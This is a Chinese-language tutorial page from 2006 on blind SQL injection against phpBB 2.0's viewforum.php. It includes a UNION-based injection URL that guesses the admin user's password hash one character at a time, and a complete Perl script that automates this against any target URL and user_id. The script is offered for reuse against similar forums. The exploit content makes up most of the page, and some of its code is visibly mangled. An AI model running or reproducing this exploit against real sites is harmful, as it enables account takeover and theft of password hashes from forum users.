php注入实例


Posted in PHP onOctober 09, 2006

php注入实例 在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}

在这里有个session_page在mysql中定义的是个整形数,他的??$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不是整数当然就要出错了,于是就显示Error creating new session : session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ************************n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

至于最近的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了,如要错误请上www.icehack.com指正.

PHP 相关文章推荐
用文本作数据处理
Oct 09 PHP
比较全面的PHP数组的使用方法小结
Sep 23 PHP
一个典型的PHP分页实例代码分享
Jul 28 PHP
php实现快速排序的三种方法分享
Mar 12 PHP
php快递单号查询接口使用示例
May 05 PHP
PHP中new static()与new self()的区别异同分析
Aug 22 PHP
PHP向浏览器输出内容的4个函数总结
Nov 17 PHP
php循环table实现一行两列显示的方法
Jun 04 PHP
php验证身份证号码正确性的函数
Jul 20 PHP
PHP+swoole+linux实现系统监控和性能优化操作示例
Apr 15 PHP
laravel实现于语言包的完美切换方法
Sep 29 PHP
PHP执行linux命令6个函数代码实例
Nov 24 PHP
967 个函式
Oct 09 #PHP
如何给phpadmin一个保护
Oct 09 #PHP
Search Engine Friendly的URL设计
Oct 09 #PHP
PHPlet在Windows下的安装
Oct 09 #PHP
一棵php的类树(支持无限分类)
Oct 09 #PHP
基于PHP+MySQL的聊天室设计
Oct 09 #PHP
Win9x/ME下Apache+PHP安装配置
Oct 09 #PHP
You might like
用php实现像JSP,ASP里Application那样的全局变量
2007/01/12 PHP
AJAX的跨域访问-两种有效的解决方法介绍
2013/06/22 PHP
php 常用算法和时间复杂度
2013/07/01 PHP
浅析PHP的静态成员函数效率更高的原因
2014/06/13 PHP
PHP创建文件,并向文件中写入数据,覆盖,追加的实现代码
2016/03/25 PHP
Yii2.0实现生成二维码功能实例
2017/10/24 PHP
Yii2 中实现单点登录的方法
2018/03/09 PHP
php 使用html5 XHR2实现上传文件与进度显示功能示例
2020/03/03 PHP
详解PHP中curl_multi并发的实现
2020/06/08 PHP
PHP 超级全局变量相关总结
2020/06/30 PHP
js使用eval解析json(js中使用json)
2014/01/17 Javascript
二叉树的非递归后序遍历算法实例详解
2014/02/07 Javascript
jQuery实现“扫码阅读”功能
2015/01/21 Javascript
JavaScript中用于四舍五入的Math.round()方法讲解
2015/06/15 Javascript
JavaScript中循环遍历Array与Map的方法小结
2016/03/12 Javascript
jQuery EasyUI编辑DataGrid用combobox实现多级联动
2016/08/29 Javascript
ES6概念 Symbol toString()方法
2016/12/25 Javascript
jQuery Validate 数组 全部验证问题
2017/01/12 Javascript
使用jQuery的load方法设计动态加载及解决被加载页面js失效问题
2017/03/01 Javascript
手把手搭建安装基于windows的Vue.js运行环境
2017/06/12 Javascript
jquery鼠标悬停导航下划线滑出效果
2017/09/29 jQuery
JS中的变量作用域(console版)
2020/07/18 Javascript
使用python实现生成用户信息
2017/03/20 Python
使用C++扩展Python的功能详解
2018/01/12 Python
Python原始套接字编程实例解析
2020/01/29 Python
ubuntu16.04升级Python3.5到Python3.7的方法步骤
2020/08/20 Python
Sentry错误日志监控使用方法解析
2020/11/12 Python
美国奢侈品购物平台:Orchard Mile
2018/05/02 全球购物
Net Remoting把服务器端激活两种模式
2014/01/22 面试题
会议活动邀请函
2014/01/27 职场文书
《唯一的听众》教学反思
2014/02/20 职场文书
暑期社会实践个人总结
2015/03/06 职场文书
2015年度招聘工作总结
2015/05/28 职场文书
我爱我班主题班会
2015/08/13 职场文书
Pytorch 如何实现LSTM时间序列预测
2021/05/17 Python
SQL Server数据库基本概念、组成、常用对象与约束
2022/03/20 SQL Server